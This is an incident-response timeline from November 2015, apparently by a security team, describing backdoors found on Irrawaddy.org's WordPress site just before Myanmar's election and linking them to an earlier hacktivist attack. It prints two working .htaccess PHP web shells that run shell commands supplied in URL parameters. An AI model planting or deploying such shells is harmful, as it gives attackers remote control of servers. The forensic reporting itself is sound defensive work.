7th Nov 15:00 PM – The IP address was involved in the October attacks!
Irrawaddy.org confirms that the very same IP address was involved in the attack to their website the 9th of October 2015 from the group “Union of Hacktivists”
7th Nov 16:30 PM – Looking for backdoors in the website
We received access credentials to look into backdoors in the website. The case is urgent as it is less than 12 hours for the Election day to start.
7th Nov 17:30 PM – No obvious evidence of malicious activity
Irrawaddy.org communicates that they believe that there is not clear signs that the site is compromised as the previous hack attempt was cleaned up by their current hosting provider.
7th Nov 17:52 PM – First backdoor found!
We found the first backdoor in the website. The backdoor executes shell commands passed in the URI using the variable “1”. Backticks in PHP they execute a command in the shell.
# cat feed/.htaccess Order allow,deny Allow from all AddType application/x-httpd-php .htaccess <!--?=@`$_GET`? >
7th Nov 19:34 PM – More backdoors…
Two previous attempts of backdooring the site are found:
wp-content/uploads/2015/01/htaccess (Jan 20 2015)
wp-content/staticfeed/htaccess (Jan 10 2015)
# Self contained .htaccess web shell - Part of the htshell project # Written by Wireghoul - http://www.justanotherhacker.com # Override default deny rule to make .htaccess file accessible over web <Files ~ "^.ht"> Order allow,deny Allow from all </Files> # Make .htaccess file be interpreted as php file. This occur after apache has interpreted # the apache directoves from the .htaccess file AddType application/x-httpd-php .htaccess .gif .phtml .jpeg .png .txt .php5 .php3 <?php echo "n";passthru($_GET['c']." 2>&1");?>